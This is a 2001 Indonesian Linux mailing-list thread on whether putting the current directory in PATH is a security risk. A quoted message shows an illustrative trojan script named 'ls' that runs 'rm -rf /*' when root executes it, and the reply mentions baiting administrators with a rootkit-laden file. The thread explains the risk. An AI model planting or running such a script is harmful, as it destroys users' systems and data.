Saya telah mencoba spy yg dikatakan Sdr. Ferdinand, dan ternyata tidak terpengaruh. AFAIK, system operasi Linux bbd dengan Windows/DOS. Linux O/S tidak membaca lsg file yang ada di direktori tempat kita bekerja, ttp me-refer tlbh dahulu ke PATH setting yg ada di /etc/bash_profile, /etc/profile. Di dalam kedua file tsb ditentukan setting path yang akan digunakan tlbh dahulu. Apabila program tidak diketemukan, barulah program yg ada di direktori yg telah kita tentukan akan dijalankan. FYI, saya mencoba di RH 7.1 dan saya nggak tau apakah di RH sebelumnya atau di distro lain bbd....
Sdgkan Windows/DOS justru mengexecute program yg ada di direktori bersangkutan... Trus terang saya blm tau utk Win2K dan XP, mudah2an teman2 dari closed-source bisa menginformasikan hal ini... Jadi dgn membuat perintah2 dasar spt ls, cp atau yg lainnya ... tidak akan berpengaruh meskipun diset 777 agar bisa diexecute oleh root di RH 7.1 Hal yg mungkin adl membuat nama file yg cukup "menggoda" dcan didalamnya menggunakan rootkit exploit, ttp biasanya sysadmin yg baik, tidak akan langsung mengexecute dan kalo mungkin akan memeriksa tlbh dahulu dgn editor atau hexviewer Dgn demikian vulnerabilities-nya hingga sejauh ini, belum ada .... Adapun command yg saya maksud dlm mengubah ./ menjadi tidak ada adl : # PATH=$PATH:. # export PATH Rgds AHK Ferdinand Neman wrote: > On Friday 23 November 2001 11:57 am, you wrote: > >>Utk menjalankan suatu aplikasi di Linux dari direktori tempat kita >>berada, biasanya kita harus mengetik ./ tlbh dahulu di depan nama >>aplikasi program yg akan dijalankan. Hal ini terkadang sgt menggangu dan >>saya telah berhasil meng-eliminate-nya shg tidak perlu menulis ./ lagi >>tp cukup nama prog.nya saja. >> >>Apakah hal ini membuka celah keamanan tertentu ??? >> > > Pasti ada... saya pernah baca dari k-elektronik > > Kalo salah seorang user anda membuat sebuah shell script seperti ini, > > #!/bin/sh > # Nama file "ls" > # File ini mod-nya 777 > rm -rf /* > echo YOU ARE DEAD !!! > > lantas sewaktu anda menjadi root dan melakukan list file di home user > tersebut.... > > [root@HOST useriseng]# ls -al > YOU ARE DEAD !!! > > Booommm.... > Install ulang.. :(. Itu sebabnya semua command hanya boleh meng-execute yang > dalam path saja. Kecuali ditentukan secara jelas path dan file yang mau di > execute. > > Mohon koreksinya. > >> >>Thx >> > Kembail :) > > -- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3
